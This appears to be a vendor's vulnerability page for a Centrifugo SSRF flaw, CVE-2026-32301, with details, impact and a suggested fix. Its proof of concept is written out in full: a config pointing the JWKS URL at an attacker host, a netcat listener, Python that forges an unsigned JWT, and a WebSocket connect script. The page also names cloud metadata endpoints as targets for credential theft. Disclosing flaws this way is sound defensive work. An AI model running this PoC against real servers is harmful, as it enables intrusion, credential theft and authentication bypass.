Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-32301

Centrifugo: SSRF via unverified JWT claims interpolated into dynamic JWKS endpoint URL
Back to all
CVE

CVE-2026-32301

Centrifugo: SSRF via unverified JWT claims interpolated into dynamic JWKS endpoint URL

Summary

Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination.

Details

In internal/jwtverify/tokenverifierjwt.go, the functions VerifyConnectToken and VerifySubscribeToken follow this flawed order of operations:

  1. Token is parsed without verification: jwt.ParseNoVerify([]byte(t))
  2. Claims are decoded from the unverified token
  3. validateClaims() runs — extracting named regex capture groups from 

   issuer_regex/audience_regex into tokenVars map using attacker-controlled 

   iss/aud claim values

  1. verifySignatureByJWK(token, tokenVars) is called — passing attacker-controlled 

   tokenVars to the JWKS manager

  1. In internal/jwks/manager.gofetchKey() interpolates tokenVars directly 

   into the JWKS URL:

   jwkURL := m.url.ExecuteString(tokenVars)

  1. Centrifugo makes an HTTP GET request to the attacker-controlled URL

Suppressed the security linter on this line with an incorrect comment:

//nolint:gosec // URL is from server configuration, not user input.

The URL is NOT purely from server configuration — it is partially constructed from unverified user-supplied JWT claims.

Signature verification happens too late — after the SSRF has already fired.

PoC

Required config (config.json):

{
  "client": {
    "token": {
      "jwks_public_endpoint": "http://ATTACKER_HOST:8888/{{tenant}}/.well-known/jwks.json",
      "issuer_regex": "^(?P[a-zA-Z0-9_-]+)\\.auth\\.example\\.com$"
    }
  },
  "http_api": { "key": "test-api-key" }
}

Step 1 — Start listener on attacker machine:

nc -lvnp 8888

Step 2 — Generate malicious unsigned JWT:

import base64, json
def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()
header  = b'{"alg":"RS256","kid":"test-kid","typ":"JWT"}'
payload = b'{"sub":"attacker","iss":"evil-tenant.auth.example.com","exp":9999999999}'
token   = f"{b64url(header)}.{b64url(payload)}.fakesig"
print(token)

Step 3 — Connect to Centrifugo WebSocket with the malicious token:

import websocket, json
ws = websocket.create_connection("ws://TARGET:8000/connection/websocket")
ws.send(json.dumps({"id": 1, "connect": {"token": ""}}))
print(ws.recv())

Step 4 — Observe incoming HTTP request on attacker listener:

GET /evil-tenant/.well-known/jwks.json HTTP/1.1
Host: ATTACKER_HOST:8888
User-Agent: Go-http-client/1.1

Malicious token being crafted with suppress_origin=True bypassing the 403, and the token sent to Centrifugo:

!1

Centrifugo Server Log:

!2

netcat terminal:

!3

Impact

  • Unauthenticated SSRF — No valid credentials required
  • Attacker can probe and access internal network services not exposed externally
  • On cloud deployments: access to metadata endpoints (AWS: 169.254.169.254, GCP: metadata.google.internal) to steal IAM credentials
  • Attacker can serve a malicious JWKS response containing their own public key, causing Centrifugo to accept attacker-signed tokens as legitimate — leading to full authentication bypass
  • Exploitation requires jwkspublicendpoint to contain {{...}} template variables combined with issuer_regex or audience_regex — a configuration pattern explicitly documented and promoted by Centrifugo

 

Suggested Fix

1. Verify signature BEFORE extracting tokenVars (critical fix):

In tokenverifierjwt.go, swap the order of operations:

// CURRENT (vulnerable) order:
// 1. ParseNoVerify
// 2. validateClaims() → populates tokenVars from unverified claims
// 3. verifySignature(token, tokenVars)  ← too late
// FIXED order:
// 1. ParseNoVerify
// 2. verifySignature(token)  ← verify first with empty/nil tokenVars
// 3. validateClaims() → only now extract tokenVars from verified claims
// 4. If JWKS needed, re-verify with tokenVars using verified kid only

2. Fix the incorrect nolint comment in manager.go:

Remove //nolint:gosec // URL is from server configuration, not user input The URL IS partially constructed from user input via JWT claims.

3. Alternative mitigation:

Restrict template variables to only the kid header field (which is not claim data) rather than allowing arbitrary claim values to influence the JWKS URL.

```

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
9.3
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
C
H
U
-

Related Resources

No items found.

References

https://github.com/centrifugal/centrifugo/security/advisories/GHSA-j77h-rr39-c552, https://github.com/centrifugal/centrifugo

Severity

9.3

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
9.3
EPSS Probability
0.0004%
EPSS Percentile
0.12078%
Introduced Version
0
Fix Available
6.7.0

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading